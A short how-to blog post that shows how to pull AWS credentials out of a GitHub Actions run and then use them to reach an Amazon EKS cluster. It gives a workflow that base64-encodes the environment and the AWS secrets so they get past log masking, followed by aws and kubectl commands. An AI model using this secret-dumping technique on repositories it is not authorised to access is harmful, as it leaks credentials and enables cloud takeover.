Post

How to get your GitHub secrets from GitHub Actions

GitHub Secrets

GitHub Actions is an automation and continuous integration/continuous deployment (CI/CD) platform provided by GitHub. It allows you to automate various tasks and workflows within your GitHub repositories, such as building, testing, and deploying your code.

GitHub Actions allows you to store sensitive information, such as API keys or access tokens, as secrets. These secrets are encrypted and can be securely used within your workflows. You can securely store and access secrets within your GitHub Actions workflows, allowing you to automate tasks that require sensitive information without compromising security.

While GitHub Secrets are secure from being exposed in plaintext within your code and logs, they are not foolproof against users with repository access because anyone with write access to the repository can potentially modify or misuse them. GitHub Secrets primarily protect against accidental exposure in public code repositories and are best suited for protecting sensitive information from unintentional leaks rather than malicious actions from users with repository access.

Access to the EKS using GitHub secrets

This post provides instructions for accessing the Amazon EKS service using GitHub secrets. The user is shown how to create a GitHub action, retrieve environment variables, add new credentials, and finally, access the EKS cluster using kubectl or Lens.

1. Take note of your GitHub Secrets

  • Access GitHub’s repository settings, locate the Secrets section.
  • Examine the names of your stored secrets for reference.

2. Create a GitHub action for the repository that has Admin access through the pipeline.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
name: test

on:
  workflow_dispatch:

jobs:
  deploy:
    runs-on: ubuntu-latest
    
    steps:

    - name: Get runner env variables
      run: env | base64

    - name: Get AWS secrets
      env:
        AWS_ACCESS_KEY_ID: ${\{ secrets.AWS_ACCESS_KEY_ID }}
        AWS_SECRET_ACCESS_KEY:  ${\{ secrets.AWS_SECRET_ACCESS_KEY }}
      run: |
        echo "AWS_ACCESS_KEY_ID= \$AWS_ACCESS_KEY_ID" | base64 
        echo "AWS_SECRET_ACCESS_KEY= \$AWS_SECRET_ACCESS_KEY" | base64

After you copy this action remove all \ symbols.

3. Run the action to get the environment variables from the runner

4. The output is base64 encrypted and you need to decrypted it to extract the variables.

5. Add new credentials

1
nano ~/.aws/credentials
1
2
3
4
[test]
aws_access_key_id = <aws_access_key_id>
aws_secret_access_key = <aws_secret_access_key>
region= <region>
1
export AWS_PROFILE=test

6. Check if you ca access the EKS cluster

1
2
3
4
5
6
7
8
9
aws eks list-clusters

Output:
{
    "clusters": [
        "example1",
        "example2"
    ]
}

7. Check out the AWS account

1
aws sts get-caller-identity

8. Get Kubeconfig file locally

1
aws eks update-kubeconfig --name example1

9. You can now take control of EKS cluster

1
2
3
kubectl get pods -A
kubectl get all -n <name>
kubectl get deployment -n dev <name> -o yaml
This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.